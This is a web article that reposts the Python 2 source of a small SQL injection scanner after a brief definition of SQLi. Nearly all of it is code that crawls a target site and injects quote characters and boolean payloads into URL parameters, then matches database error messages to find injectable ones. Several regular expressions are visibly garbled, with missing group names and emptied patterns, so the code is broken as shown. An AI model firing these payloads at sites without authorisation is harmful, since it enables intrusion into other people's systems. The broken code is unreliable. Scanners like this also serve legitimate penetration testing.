Damn Small SQLi Scanner (DSSS) v0.1b - 100 Lines Python Code
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It happens from using Microsoft SQL or other poorly designed query language interpreters.


Source Code :
#!/usr/bin/env python
import difflib, httplib, optparse, random, re, sys, urllib2, urlparse
NAME    = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)"
VERSION = "0.1b"
AUTHOR  = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)"
NOTE    = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)"

INVALID_SQL_CHAR_POOL = ['(',')','\'','"']
CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz")
SUFFIXES = ["", "-- ", "#"]
PREFIXES = [" ", ") ", "' ", "') "]
BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"]

DBMS_ERRORS = {}
DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."]
DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."]
DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."]
DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"]
DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"]
DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"]
DBMS_ERRORS["Informix"] = [r"Exception.*Informix"]
DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"]
DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"]
DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"]
DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"]
DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"]

def getTextOnly(page):
    retVal = re.sub(r"(?s)|||<[^>]+>|\s", " ", page)
    retVal = re.sub(r"\s{2,}", " ", retVal)
    return retVal

def retrieveContent(url):
    retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content]
    try:
        retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read()
    except Exception, e:
        if hasattr(e, 'read'):
            retVal[3] = e.read()
        elif hasattr(e, 'msg'):
            retVal[3] = e.msg
        retVal[1] = e.code if hasattr(e, 'code') else None
    match = re.search(r"(?P<title>[^<]+)", retVal[3])
    retVal[2] = match.group("title") if match else ""
    retVal[0] = getTextOnly(retVal[3])
    return retVal

def shallowCrawl(url):
    retVal = set([url])
    page = retrieveContent(url)[3]
    for match in re.finditer(r"href\s*=\s*\"(?P[^\"]+)\"", page, re.I):
        link = urlparse.urljoin(url, match.group("href"))
        if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS:
            if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])):
                retVal.add(link)
    return retVal

def scanPage(url):
    for link in shallowCrawl(url):
        print "* scanning: %s" % link
        for match in re.finditer(r"(?:[?&;])((?P\w+)=[^&;]+)", link):
            vulnerable = False
            tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL))))
            content = retrieveContent(tampered)
            for dbms in DBMS_ERRORS:
                for regex in DBMS_ERRORS[dbms]:
                    if not vulnerable and re.search(regex, content[0], re.I):
                        print " (o) parameter '%s' could be SQLi vulnerable! (%s error message)" % (match.group('parameter'), dbms)
                        vulnerable = True
            if not vulnerable:
                original = retrieveContent(link)
                a, b = random.randint(100, 255), random.randint(100, 255)
                for prefix in PREFIXES:
                    for boolean in BOOLEANS:
                        for suffix in SUFFIXES:
                            if not vulnerable:
                                template = "%s%s%s" % (prefix, boolean, suffix)
                                payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, b))))
                                contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])]
                                if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original) == len(contents[0][0]) != len(contents[1][0]):
                                    vulnerable = True
                                else:
                                    ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]])
                                    vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95
                                if vulnerable:
                                    print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0])

if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.htm?id=1\")")
    options, _ = parser.parse_args()
    if options.url:
        scanPage(options.url)
    else:
        parser.print_help()

Have something to say about this article? Comment below or share it with us on Facebook, Twitter or our LinkedIn Group.